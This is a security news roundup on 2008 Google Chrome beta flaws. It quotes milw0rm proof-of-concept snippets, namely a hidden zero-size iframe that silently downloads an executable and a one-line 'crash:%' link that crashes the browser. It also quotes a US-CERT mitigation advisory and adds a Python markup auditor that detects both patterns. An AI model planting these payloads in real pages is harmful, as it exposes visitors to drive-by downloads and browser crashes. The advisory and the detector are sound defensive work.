Google Chrome Browser 0.2.149.27 malicious link DoS Vulnerability
A PoC has reportedly been released for a denial-of-service issue in Google Chrome.
Problem:
http://www.milw0rm.com/exploits/6353
An issue exists in how chrome behaves with undefined-handlers in chrome.dll version
0.2.149.27. A crash can result without user interaction. When a user is made to visit
a malicious link, which has an undefined handler followed by a 'special' character,
the chrome crashes with a Google Chrome message window "Whoa! Google Chrome has crashed.
Restart now?". It lies in dealing with the POP EBP instruction when pointed out by the
EIP register at 0x01002FF4.
Apparently Chrome will go ahead and open an iframe written via JavaScript.
***************************************************************************
Author: nerex
E-mail: nerex[at]live[dot]com
Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically
downloaded to the user's computer without any user prompt.
This proof-of-concept was created for educational purposes only.
Use the code at your own risk.
The author will not be responsible for any damages.
Tested on Windows Vista SP1 and Windows XP SP3 with Google Chrome (BETA)
http://www.milw0rm.com/exploits/6355
**************************************************************************
<script> document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">'); </script>
http://www.milw0rm.com/exploits/6355
US-CERT has also issued an advisory.
US-CERT is aware of a vulnerability that affects the Google Chrome web browser. This vulnerability is due to a default configuration that allows files to be downloaded without prompting the user. In addition, downloaded files can be opened with a single click, which could allow a user to inadvertently open a malicious file.
http://www.us-cert.gov/current/index.html#google_chrome_vulnerability
US-CERT encourages users to enable the "Ask where to save each file before downloading" option within the "Minor Tweaks" tab in the browser preferences. Although this does not fix the underlying vulnerability, selecting this option will warn the user before files are downloaded. Users should still exercise caution when visiting and downloading items from untrusted websites.
US-CERT will provide additional information as it becomes available.
Apparently this little bit of code is all it takes to crash it, lol.
Want to crash Chrome? Kolor, a regular contributor to the blog, had some fun and put the following in the comments:
GFI LABS Blog: Some more Chrome fun
<a href=crash:%>
Poof.
You can see it yourself, if you’re running Chrome, here.
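For sites that accept user-submitted markup (the crash link above was posted in a blog comment), the following added example, which is not part of any of the quoted sources, flags the two patterns quoted on this page: a zero-size iframe pointing at an executable, including one emitted through document.write(), and a link with an unrecognised scheme followed by a malformed `%` escape. The names `MarkupAuditor` and `audit`, the extension list and the scheme allowlist are assumptions made for the example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed policy for this example: executable extensions and permitted link schemes.
EXECUTABLE_EXT = (".exe", ".scr", ".com", ".bat", ".msi")
ALLOWED_SCHEMES = {"", "http", "https", "mailto", "ftp"}
BAD_PERCENT = re.compile(r"%(?![0-9A-Fa-f]{2})")  # '%' not followed by two hex digits
# Constructed sample input: the two snippets quoted on this page, joined together.
SAMPLE = ("<script> document.write('<iframe src=\"http://www.example.com/hello.exe\""
          " frameborder=\"0\" width=\"0\" height=\"0\">'); </script><a href=crash:%>")


class MarkupAuditor(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "script":
            self._in_script = True
        elif tag == "iframe":
            # Invisible frame whose target path ends in an executable extension.
            hidden = "0" in (a.get("width"), a.get("height"))
            path = urlsplit(a.get("src", "")).path.lower()
            if hidden and path.endswith(EXECUTABLE_EXT):
                self.findings.append(("hidden-exe-iframe", a["src"]))
        elif tag == "a":
            # Scheme outside the allowlist combined with a broken percent-escape.
            href = a.get("href", "")
            scheme = urlsplit(href).scheme.lower()
            if scheme not in ALLOWED_SCHEMES and BAD_PERCENT.search(href):
                self.findings.append(("unknown-scheme-bad-escape", href))

    def handle_endtag(self, tag):
        self._in_script = self._in_script and tag != "script"

    def handle_data(self, data):
        # Markup built with document.write() sits inside script text: re-scan it.
        if self._in_script and "<" in data:
            self.findings += audit(data)


def audit(markup):
    parser = MarkupAuditor()
    parser.feed(markup)
    parser.close()  # flush any text still buffered by the parser
    return parser.findings
```

`audit(SAMPLE)` returns one finding per snippet. Markup assembled from concatenated or escaped JavaScript strings is outside what this string-level re-scan can see.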
Related URLs
- Google Chrome vulnerable to carpet-bombing flaw | Zero Day | ZDNet.com
- SecuriTeam™ - Google Chrome Browser URL Handler Crash
- Google Chrome Remote Denial of Service Vulnerability
- Sunbelt Blog: Chrome rocks. I don't care what others say
- SecurityFocus
- http://www.milw0rm.com/exploits/6355
- http://www.us-cert.gov/current/index.html#google_chrome_vulnerability
- Hackers Center Security Blogs - Google Chrome vulnerabilities list
- First security vulnerability in "Google Chrome" - Security - ZDNet Japan
- Google collects user information entered into Google Chrome's address bar "Omnibox": News - CNET Japan
- MSFN - Google on Chrome EULA controversy: our bad, we'll change it
- Hackers Center Security Blogs - Google Chrome Silent File Download Exploit
- Google Chrome Browser 0.2.149.27 (SaveAs) Remote BOF Exploit